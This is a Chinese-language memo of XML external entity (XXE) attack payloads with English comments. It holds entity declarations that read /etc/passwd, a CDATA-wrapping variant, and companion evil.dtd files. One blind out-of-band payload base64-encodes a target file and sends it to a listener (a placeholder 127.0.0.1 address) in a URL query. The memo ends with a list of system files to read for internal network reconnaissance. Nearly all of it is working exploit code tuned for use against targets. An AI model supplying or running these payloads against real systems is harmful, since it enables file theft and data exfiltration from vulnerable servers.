XXE 总结笔记

记录一下常用的 XXE payload (下面的 127.0.0.1 都是占位, 实际使用时换成自己可收到请求的监听地址)

想到啥写啥, 只是一个备忘录

SYSTEM

<!-- SYSTEM form: declares a general entity named "xxs" whose replacement text is
     loaded from the given URI (here a local file). It is expanded wherever the
     document references &xxs;. The entity name is arbitrary. -->
<!ENTITY xxs SYSTEM "file:///etc/passwd" >

PUBLIC

<!-- PUBLIC form of an external entity: a public identifier ("dtd" here is just a
     placeholder) followed by the system URI that is actually fetched. The leading
     "%" makes this a parameter entity, so it can only be referenced inside the DTD
     (as %remote;), not in the document body. -->
<!ENTITY % remote PUBLIC "dtd" "http://127.0.0.1/evil.dtd">

通用实体

<?xml version="1.0" encoding="utf-8"?>
<!-- Basic in-band XXE: the general entity "file" is declared with an external
     SYSTEM identifier, and &file; in the body is replaced by the file content,
     which then appears wherever the application echoes the parsed <test> text.
     Because the replacement text is parsed as XML, this fails with a parse error
     if the target file contains markup characters such as "<" or "&"; the CDATA
     variant below exists for that case. -->
<!DOCTYPE test [
<!ENTITY file SYSTEM "file:///etc/passwd">]>
<test>
&file;
</test>

参数实体 (利用 CDATA 把文件内容包起来, 避免文件里的 `<`、`&` 等字符破坏 XML 解析)

<?xml version="1.0" encoding="utf-8"?>
<!-- CDATA-wrapped variant: the file content is spliced between "<![CDATA[" and
     "]]>" so that markup characters in it do not break parsing. The three pieces
     are parameter entities; they are glued together in the external evil.dtd
     (as %start;%xxe;%end;) rather than here, because a parameter-entity reference
     inside an entity value is not allowed in the internal subset. The external
     DTD is what defines the general entity &all; used in the body.
     Caveats: content containing "]]>" still terminates the CDATA section early,
     and parsers differ on whether an external parameter entity may be expanded
     inside an entity value at all - verify against the target stack. -->
<!DOCTYPE test [
<!ENTITY % start "<![CDATA[">
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY % end "]]>">
<!-- %dtd; is fine here: it is a reference between declarations, not inside a value. -->
<!ENTITY % dtd SYSTEM "http://127.0.0.1/evil.dtd">
%dtd;]>
<test>
&all;
</test>

evil.dtd

<?xml version="1.0" encoding="utf-8"?>
<!-- evil.dtd for the CDATA variant, served from the attacker host. Defines the
     general entity &all; by concatenating the three parameter entities declared
     in the document's internal subset, so the file content from %xxe; ends up
     inside a CDATA section. -->
<!ENTITY all "%start;%xxe;%end;" >

payload (OOB 外带 / blind XXE: 目标不回显解析结果时, 通过外部 DTD 把文件内容拼进 URL, 让解析器主动请求监听地址带出数据)

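<!DOCTYPE test [
<!-- Blind / out-of-band XXE: %remote; fetches the attacker DTD, %int; expands to
     a declaration of the parameter entity "send", and %send; dereferences it so
     the parser makes the outbound request that carries the file content.
     Fixed: the original wrote "$remote;", which is not a parameter-entity
     reference (a syntax error inside the internal subset), so %int and %send
     would never have been defined and the exfiltration request never sent. -->
<!ENTITY % remote SYSTEM "http://127.0.0.1/evil.dtd">
%remote;%int;%send;
]>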

evil.dtd

2
<!-- evil.dtd for the OOB variant. %file reads the target file through PHP's
     php://filter stream wrapper, base64-encoded so newlines and special characters
     survive inside a URL. This wrapper only exists on PHP targets; on other stacks
     use a plain file:// URI, which then breaks on content with newlines or markup. -->
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!-- %int expands to a nested declaration of the parameter entity "send" whose
     SYSTEM URI embeds %file;. The percent sign is written as &#37; so it is not
     treated as a parameter-entity reference while %int itself is being parsed.
     Dereferencing %send; in the document triggers the GET to the listener with the
     base64 content in the "p" query parameter.
     NOTE(review): large files may exceed URL length limits in the parser or the
     listener - verify, or read smaller files / exfiltrate in chunks. -->
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://127.0.0.1/?p=%file;'>">
拿到任意文件读之后, 常用来做内网探测的文件 (网卡配置、hosts、ARP 表、TCP/UDP 连接表、网卡统计、路由/IP 信息):

/etc/network/interfaces
/etc/hosts
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/proc/net/dev
/proc/net/fib_trie